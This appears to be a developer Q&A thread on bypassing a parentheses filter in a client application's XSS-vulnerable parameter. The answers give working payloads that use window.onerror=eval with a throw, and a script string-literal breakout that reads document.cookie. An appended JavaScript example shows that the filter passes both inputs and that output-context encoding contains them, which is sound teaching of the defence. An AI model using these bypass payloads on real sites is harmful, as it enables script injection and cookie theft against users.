Parentheses Alternatives In JS, If Any?
I have found a Cross Site Scripting vulnerability in a client's application. The problem is that the vulnerable parameter does not accept parentheses. So something like alert(do
Solution 1:
document.body.innerHTML=document.cookie
will display the cookies on the page itself.
Speaking of the XSS vulnerability: Yes, it is vulnerable and disabling parentheses will just force attackers to use more creative methods. Letting someone execute any arbitrary code is a liability.
Here's a simple example of how you can call any function with any parameters without using any parentheses in your input:
<p>Malicious input: window.onerror=eval;throw '=1;alert\u0028document.location\u0029'</p>
<input type="button" onclick="window.onerror=eval;throw '=1;alert\u0028document.location\u0029'" value="Click me">
Solution 2:
This is another solution that worked for me:
<script>var firstname = 'aa';document.location='javascript:alert%28document.cookie%29';//';</script>
The payload would be:
?vulnparam=aa';document.location='javascript:alert%2528document.cookie%2529';//
@tcooc's answer also works.
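Added example, not part of either answer: both inputs above pass a "no parentheses" filter, so the fix has to be encoding for the output context, here the inline script string literal from Solution 2. The function names and the template are hypothetical; the sample inputs are the ones quoted in the answers.

```javascript
// Weak control described in the question: reject input containing parentheses.
function parenFilterAllows(input) {
  return !/[()]/.test(input);
}

// Encode a value as a JavaScript string literal for use inside an HTML <script> block.
// JSON.stringify quotes the value and escapes ", \ and control characters; the replace
// also escapes characters that could close the script element or split the line.
// Escaping ' is not required in a double-quoted literal; it is kept as defence in depth.
function encodeForInlineScript(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

// Hypothetical server-side template matching the script block shown in Solution 2.
function renderVulnerable(firstname) {
  return "<script>var firstname = '" + firstname + "';</script>";
}
function renderEncoded(firstname) {
  return "<script>var firstname = " + encodeForInlineScript(firstname) + ";</script>";
}

// True when the encoded output is one string literal that decodes back to the input,
// i.e. the value stayed data and could not leave the literal.
function literalRoundTrips(value) {
  const html = renderEncoded(value);
  const literal = html.slice("<script>var firstname = ".length, -";</script>".length);
  return JSON.parse(literal) === value;
}

// Inputs quoted in the two answers (the second as it reaches the template after decoding).
const samples = [
  "window.onerror=eval;throw '=1;alert\\u0028document.location\\u0029'",
  "aa';document.location='javascript:alert%28document.cookie%29';//",
];

for (const s of samples) {
  console.log("filter allows:", parenFilterAllows(s));
  console.log("concatenated :", renderVulnerable(s));
  console.log("encoded      :", renderEncoded(s));
  console.log("stays data   :", literalRoundTrips(s));
}
```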